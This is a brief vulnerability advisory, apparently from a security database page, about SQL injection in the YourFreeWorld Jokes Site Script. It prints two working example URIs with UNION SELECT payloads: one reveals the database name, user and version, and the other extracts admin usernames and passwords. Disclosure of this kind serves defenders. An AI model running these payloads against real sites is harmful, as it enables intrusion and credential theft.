|
YourFreeWorld Jokes Site Script 'categorie' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example URIs are available: http://www.example.com/jokesite/jokes.php?catagorie=-1%20union%20select%201,convert(concat(database(),char(58),user(),char(58),version()),char)/* http://www.example.com/jokes.php?catagorie=-5+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password)+from+adminsettings-- |
|
|
Privacy Statement |